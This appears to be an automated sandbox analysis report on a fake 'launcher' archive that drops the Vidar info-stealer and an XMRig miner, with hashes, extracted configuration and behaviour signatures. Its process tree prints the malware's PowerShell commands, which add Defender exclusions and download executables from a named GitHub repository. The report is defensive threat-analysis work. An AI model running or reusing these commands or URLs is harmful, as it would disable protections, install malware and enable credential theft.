Analysis
-
max time kernel
59s -
max time network
107s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
21/04/2025, 09:34
Static task
static1
Behavioral task
behavioral1
Sample
Iаuncher_v9.1.rar
Resource
win10v2004-20250314-en
Behavioral task
behavioral2
Sample
Iаuncher_v9.1.rar
Resource
win11-20250410-en
Behavioral task
behavioral3
Sample
S0FTWARE.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral4
Sample
S0FTWARE.exe
Resource
win11-20250410-en
General
-
Target
Iаuncher_v9.1.rar
-
Size
13.6MB
-
MD5
6adf66f995f52565c6f44edd024ad6d5
-
SHA1
4ced5eb46794194e90a0baf8d01d78efdaaa2a77
-
SHA256
39b8d89f49c86b2a1f876763e3b4666749c85de715aa10aa96a00d5a2d83861a
-
SHA512
0ccc86c3e6605299f2d24c7982e909af038ffc030e82426ac7cecf8f797e2b0122b18722056d381764056c21e340e8e01df1b1025764e7a9158d43cbcb944522
-
SSDEEP
393216:xTR2upwCQ5NKmlfv29/Vbrb3C48I5x2jUyt2jSVdXR/X:x8gwCQPJv29BHzfxdQ3R/
Malware Config
Extracted
vidar
13.5
fe765de57643ac9d227ea7737a97bb87
https://t.me/v00rd
https://steamcommunity.com/profiles/76561199846773220
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Signatures
-
Detect Vidar Stealer 1 IoCs
resource yara_rule behavioral1/files/0x0009000000024313-34.dat family_vidar_v7 -
Vidar family
-
Xmrig family
-
XMRig Miner payload 9 IoCs
resource yara_rule behavioral1/memory/2664-862-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/2664-863-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/2664-869-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/2664-867-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/2664-866-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/2664-865-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/2664-868-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/2664-1126-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/2664-1127-0x0000000140000000-0x0000000140835000-memory.dmp xmrig -
Blocklisted process makes network request 10 IoCs
flow pid Process 26 3588 powershell.exe 28 3588 powershell.exe 29 5092 powershell.exe 34 5092 powershell.exe 40 4880 powershell.exe 43 4880 powershell.exe 201 5264 powershell.exe 205 5264 powershell.exe 212 5860 powershell.exe 213 5860 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3020 powershell.exe 436 powershell.exe 552 powershell.exe 5384 powershell.exe 4736 powershell.exe 6108 powershell.exe 5264 powershell.exe 5860 powershell.exe 3560 powershell.exe 5976 powershell.exe 4720 powershell.exe 1092 powershell.exe 5716 powershell.exe 4780 powershell.exe 2152 powershell.exe 3588 powershell.exe 5092 powershell.exe 4880 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 5 IoCs
flow pid Process 34 5092 powershell.exe 43 4880 powershell.exe 205 5264 powershell.exe 213 5860 powershell.exe 28 3588 powershell.exe -
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\system32\drivers\etc\hosts opigwliiren.exe File created C:\Windows\system32\drivers\etc\hosts Updater.exe -
Stops running service(s) 4 TTPs
-
Uses browser remote debugging 2 TTPs 26 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 5020 msedge.exe 4640 chrome.exe 3476 chrome.exe 4984 chrome.exe 2120 chrome.exe 4920 chrome.exe 1468 chrome.exe 6008 msedge.exe 5832 chrome.exe 448 chrome.exe 5564 chrome.exe 5868 chrome.exe 5536 chrome.exe 5452 chrome.exe 5172 chrome.exe 3148 chrome.exe 2044 chrome.exe 32 chrome.exe 4044 chrome.exe 4948 msedge.exe 1844 chrome.exe 700 chrome.exe 5848 chrome.exe 4212 chrome.exe 2864 chrome.exe 880 msedge.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation S0FTWARE.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation aaccaa.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation service.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation S0FTWARE.exe -
Executes dropped EXE 8 IoCs
pid Process 2928 S0FTWARE.exe 3868 gjgxitnlso.exe 4696 aaccaa.exe 4496 opigwliiren.exe 2192 service.exe 3336 S0FTWARE.exe 4332 Updater.exe 5076 kbfkegxz.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 16 IoCs
flow ioc 263 raw.githubusercontent.com 27 raw.githubusercontent.com 43 raw.githubusercontent.com 239 raw.githubusercontent.com 28 raw.githubusercontent.com 34 raw.githubusercontent.com 272 raw.githubusercontent.com 204 raw.githubusercontent.com 206 pastebin.com 207 pastebin.com 213 raw.githubusercontent.com 257 raw.githubusercontent.com 280 raw.githubusercontent.com 205 raw.githubusercontent.com 278 raw.githubusercontent.com 289 raw.githubusercontent.com -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 3380 powercfg.exe 6000 powercfg.exe 2220 powercfg.exe 1000 powercfg.exe 332 powercfg.exe 4348 powercfg.exe 2880 powercfg.exe 5664 powercfg.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe Updater.exe File opened for modification C:\Windows\system32\MRT.exe opigwliiren.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4332 set thread context of 5012 4332 Updater.exe 197 PID 4332 set thread context of 2664 4332 Updater.exe 199 -
resource yara_rule behavioral1/memory/2664-857-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/2664-860-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/2664-862-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/2664-863-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/2664-869-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/2664-867-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/2664-866-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/2664-865-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/2664-868-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/2664-861-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/2664-859-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/2664-858-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/2664-1126-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/2664-1127-0x0000000140000000-0x0000000140835000-memory.dmp upx -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5688 sc.exe 5748 sc.exe 3528 sc.exe 2152 sc.exe 3600 sc.exe 5868 sc.exe 5820 sc.exe 3204 sc.exe 512 sc.exe 2700 sc.exe 1584 sc.exe 4292 sc.exe 2100 sc.exe 3392 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aaccaa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language service.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gjgxitnlso.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kbfkegxz.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 gjgxitnlso.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString gjgxitnlso.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4048 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Modifies data under HKEY_USERS 52 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs explorer.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates explorer.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133897018153167803" chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5352 schtasks.exe 3204 schtasks.exe 3588 schtasks.exe 5032 schtasks.exe 3020 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4736 powershell.exe 4736 powershell.exe 4736 powershell.exe 3588 powershell.exe 3588 powershell.exe 3588 powershell.exe 5092 powershell.exe 5092 powershell.exe 5092 powershell.exe 4880 powershell.exe 4880 powershell.exe 4880 powershell.exe 3868 gjgxitnlso.exe 3868 gjgxitnlso.exe 3868 gjgxitnlso.exe 3868 gjgxitnlso.exe 5536 chrome.exe 5536 chrome.exe 5536 chrome.exe 3868 gjgxitnlso.exe 3868 gjgxitnlso.exe 3868 gjgxitnlso.exe 3868 gjgxitnlso.exe 4496 opigwliiren.exe 6108 powershell.exe 6108 powershell.exe 6108 powershell.exe 4496 opigwliiren.exe 4496 opigwliiren.exe 4496 opigwliiren.exe 3868 gjgxitnlso.exe 3868 gjgxitnlso.exe 4496 opigwliiren.exe 4496 opigwliiren.exe 4496 opigwliiren.exe 4496 opigwliiren.exe 4496 opigwliiren.exe 4496 opigwliiren.exe 4496 opigwliiren.exe 4496 opigwliiren.exe 4496 opigwliiren.exe 4496 opigwliiren.exe 4496 opigwliiren.exe 4332 Updater.exe 3020 powershell.exe 3020 powershell.exe 3020 powershell.exe 4332 Updater.exe 4332 Updater.exe 4332 Updater.exe 4332 Updater.exe 4332 Updater.exe 4332 Updater.exe 4332 Updater.exe 4332 Updater.exe 4332 Updater.exe 4332 Updater.exe 4332 Updater.exe 4332 Updater.exe 436 powershell.exe 436 powershell.exe 436 powershell.exe 5264 powershell.exe 5264 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2328 7zFM.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 5536 chrome.exe 5536 chrome.exe 5536 chrome.exe 5536 chrome.exe 5020 msedge.exe 5020 msedge.exe -
Suspicious use of AdjustPrivilegeToken 44 IoCs
description pid Process Token: SeRestorePrivilege 2328 7zFM.exe Token: 35 2328 7zFM.exe Token: SeSecurityPrivilege 2328 7zFM.exe Token: SeDebugPrivilege 4736 powershell.exe Token: SeDebugPrivilege 3588 powershell.exe Token: SeDebugPrivilege 5092 powershell.exe Token: SeDebugPrivilege 4880 powershell.exe Token: SeShutdownPrivilege 5536 chrome.exe Token: SeCreatePagefilePrivilege 5536 chrome.exe Token: SeShutdownPrivilege 5536 chrome.exe Token: SeCreatePagefilePrivilege 5536 chrome.exe Token: SeShutdownPrivilege 5536 chrome.exe Token: SeCreatePagefilePrivilege 5536 chrome.exe Token: SeShutdownPrivilege 5536 chrome.exe Token: SeCreatePagefilePrivilege 5536 chrome.exe Token: SeShutdownPrivilege 5536 chrome.exe Token: SeCreatePagefilePrivilege 5536 chrome.exe Token: SeShutdownPrivilege 5536 chrome.exe Token: SeCreatePagefilePrivilege 5536 chrome.exe Token: SeShutdownPrivilege 5536 chrome.exe Token: SeCreatePagefilePrivilege 5536 chrome.exe Token: SeSecurityPrivilege 2328 7zFM.exe Token: SeDebugPrivilege 6108 powershell.exe Token: SeShutdownPrivilege 2220 powercfg.exe Token: SeCreatePagefilePrivilege 2220 powercfg.exe Token: SeShutdownPrivilege 5664 powercfg.exe Token: SeCreatePagefilePrivilege 5664 powercfg.exe Token: SeShutdownPrivilege 6000 powercfg.exe Token: SeCreatePagefilePrivilege 6000 powercfg.exe Token: SeShutdownPrivilege 3380 powercfg.exe Token: SeCreatePagefilePrivilege 3380 powercfg.exe Token: SeDebugPrivilege 3020 powershell.exe Token: SeLockMemoryPrivilege 2664 explorer.exe Token: SeShutdownPrivilege 2880 powercfg.exe Token: SeCreatePagefilePrivilege 2880 powercfg.exe Token: SeShutdownPrivilege 1000 powercfg.exe Token: SeCreatePagefilePrivilege 1000 powercfg.exe Token: SeShutdownPrivilege 332 powercfg.exe Token: SeCreatePagefilePrivilege 332 powercfg.exe Token: SeShutdownPrivilege 4348 powercfg.exe Token: SeCreatePagefilePrivilege 4348 powercfg.exe Token: SeDebugPrivilege 436 powershell.exe Token: SeDebugPrivilege 5264 powershell.exe Token: SeDebugPrivilege 5860 powershell.exe -
Suspicious use of FindShellTrayWindow 31 IoCs
pid Process 2328 7zFM.exe 2328 7zFM.exe 2328 7zFM.exe 5536 chrome.exe 5536 chrome.exe 5536 chrome.exe 5536 chrome.exe 5536 chrome.exe 5536 chrome.exe 5536 chrome.exe 5536 chrome.exe 5536 chrome.exe 5536 chrome.exe 5536 chrome.exe 5536 chrome.exe 5536 chrome.exe 5536 chrome.exe 5536 chrome.exe 5536 chrome.exe 5536 chrome.exe 5536 chrome.exe 5536 chrome.exe 5536 chrome.exe 5536 chrome.exe 5536 chrome.exe 5536 chrome.exe 5536 chrome.exe 5536 chrome.exe 5536 chrome.exe 2328 7zFM.exe 5020 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2328 wrote to memory of 2928 2328 7zFM.exe 95 PID 2328 wrote to memory of 2928 2328 7zFM.exe 95 PID 2928 wrote to memory of 4628 2928 S0FTWARE.exe 98 PID 2928 wrote to memory of 4628 2928 S0FTWARE.exe 98 PID 4628 wrote to memory of 4736 4628 cmd.exe 99 PID 4628 wrote to memory of 4736 4628 cmd.exe 99 PID 2928 wrote to memory of 3412 2928 S0FTWARE.exe 100 PID 2928 wrote to memory of 3412 2928 S0FTWARE.exe 100 PID 3412 wrote to memory of 3588 3412 cmd.exe 101 PID 3412 wrote to memory of 3588 3412 cmd.exe 101 PID 2928 wrote to memory of 5404 2928 S0FTWARE.exe 102 PID 2928 wrote to memory of 5404 2928 S0FTWARE.exe 102 PID 5404 wrote to memory of 5092 5404 cmd.exe 103 PID 5404 wrote to memory of 5092 5404 cmd.exe 103 PID 2928 wrote to memory of 3868 2928 S0FTWARE.exe 104 PID 2928 wrote to memory of 3868 2928 S0FTWARE.exe 104 PID 2928 wrote to memory of 3868 2928 S0FTWARE.exe 104 PID 2928 wrote to memory of 4384 2928 S0FTWARE.exe 105 PID 2928 wrote to memory of 4384 2928 S0FTWARE.exe 105 PID 4384 wrote to memory of 4880 4384 cmd.exe 106 PID 4384 wrote to memory of 4880 4384 cmd.exe 106 PID 2928 wrote to memory of 4696 2928 S0FTWARE.exe 107 PID 2928 wrote to memory of 4696 2928 S0FTWARE.exe 107 PID 2928 wrote to memory of 4696 2928 S0FTWARE.exe 107 PID 4696 wrote to memory of 5660 4696 aaccaa.exe 108 PID 4696 wrote to memory of 5660 4696 aaccaa.exe 108 PID 4696 wrote to memory of 5660 4696 aaccaa.exe 108 PID 5660 wrote to memory of 3204 5660 cmd.exe 110 PID 5660 wrote to memory of 3204 5660 cmd.exe 110 PID 5660 wrote to memory of 3204 5660 cmd.exe 110 PID 3868 wrote to memory of 5536 3868 gjgxitnlso.exe 112 PID 3868 wrote to memory of 5536 3868 gjgxitnlso.exe 112 PID 5536 wrote to memory of 768 5536 chrome.exe 113 PID 5536 wrote to memory of 768 5536 chrome.exe 113 PID 5536 wrote to memory of 3980 5536 chrome.exe 114 PID 5536 wrote to memory of 3980 5536 chrome.exe 114 PID 5536 wrote to memory of 3980 5536 chrome.exe 114 PID 5536 wrote to memory of 3980 5536 chrome.exe 114 PID 5536 wrote to memory of 3980 5536 chrome.exe 114 PID 5536 wrote to memory of 3980 5536 chrome.exe 114 PID 5536 wrote to memory of 3980 5536 chrome.exe 114 PID 5536 wrote to memory of 3980 5536 chrome.exe 114 PID 5536 wrote to memory of 3980 5536 chrome.exe 114 PID 5536 wrote to memory of 3980 5536 chrome.exe 114 PID 5536 wrote to memory of 3980 5536 chrome.exe 114 PID 5536 wrote to memory of 3980 5536 chrome.exe 114 PID 5536 wrote to memory of 3980 5536 chrome.exe 114 PID 5536 wrote to memory of 3980 5536 chrome.exe 114 PID 5536 wrote to memory of 3980 5536 chrome.exe 114 PID 5536 wrote to memory of 3980 5536 chrome.exe 114 PID 5536 wrote to memory of 3980 5536 chrome.exe 114 PID 5536 wrote to memory of 3980 5536 chrome.exe 114 PID 5536 wrote to memory of 3980 5536 chrome.exe 114 PID 5536 wrote to memory of 3980 5536 chrome.exe 114 PID 5536 wrote to memory of 3980 5536 chrome.exe 114 PID 5536 wrote to memory of 3980 5536 chrome.exe 114 PID 5536 wrote to memory of 3980 5536 chrome.exe 114 PID 5536 wrote to memory of 3980 5536 chrome.exe 114 PID 5536 wrote to memory of 3980 5536 chrome.exe 114 PID 5536 wrote to memory of 3980 5536 chrome.exe 114 PID 5536 wrote to memory of 3980 5536 chrome.exe 114 PID 5536 wrote to memory of 3980 5536 chrome.exe 114 PID 5536 wrote to memory of 3980 5536 chrome.exe 114 PID 5536 wrote to memory of 3980 5536 chrome.exe 114
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Iаuncher_v9.1.rar"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Users\Admin\AppData\Local\Temp\7zO8193B2E7\S0FTWARE.exe"C:\Users\Admin\AppData\Local\Temp\7zO8193B2E7\S0FTWARE.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2928 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\glrfnz', 'C:\Users', 'C:\ProgramData'"3⤵
- Suspicious use of WriteProcessMemory
PID:4628 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\glrfnz', 'C:\Users', 'C:\ProgramData'"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4736
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\glrfnz\gjgxitnlso.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:3412 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\glrfnz\gjgxitnlso.exe'"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3588
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\glrfnz\aaccaa.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:5404 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\glrfnz\aaccaa.exe'"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5092
-
-
-
C:\Users\Admin\AppData\Local\glrfnz\gjgxitnlso.exe"C:\Users\Admin\AppData\Local\glrfnz\gjgxitnlso.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3868 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5536 -
